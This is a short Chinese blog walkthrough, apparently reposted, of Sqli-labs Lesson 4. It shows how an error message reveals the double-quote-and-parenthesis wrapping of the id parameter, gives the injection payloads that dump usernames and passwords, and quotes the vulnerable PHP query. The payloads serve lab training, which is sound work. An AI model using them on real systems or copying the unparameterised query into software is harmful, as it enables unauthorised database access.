Sqli-labs less 4

本文介绍了一种特定场景下的SQL注入技巧,通过构造特殊payload绕过应用程序的安全检查,获取数据库中的敏感信息。文中详细展示了如何利用SQL语法错误进行攻击,并给出了具体的SQL查询语句示例。

转自: lcamry

Less-4

我们使用?id=1"

注入代码后,我们得到像这样的一个错误:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

这里它意味着,代码当中对id参数进行了 "" 和 () 的包装。

所以我们再用这样的代码来进行注入:

?id=1") –-+

这样一来,我们便可以得到用户名和密码了,同时后面查询也已经被注释掉了。

在源代码中的SQL查询语句,31行:

$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";

可以成功注入的有:

") or "1"=("1
") or 1=1 --+

其余的payload与less1中一直,只需要将less1中的 ' 更换为 ") 。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值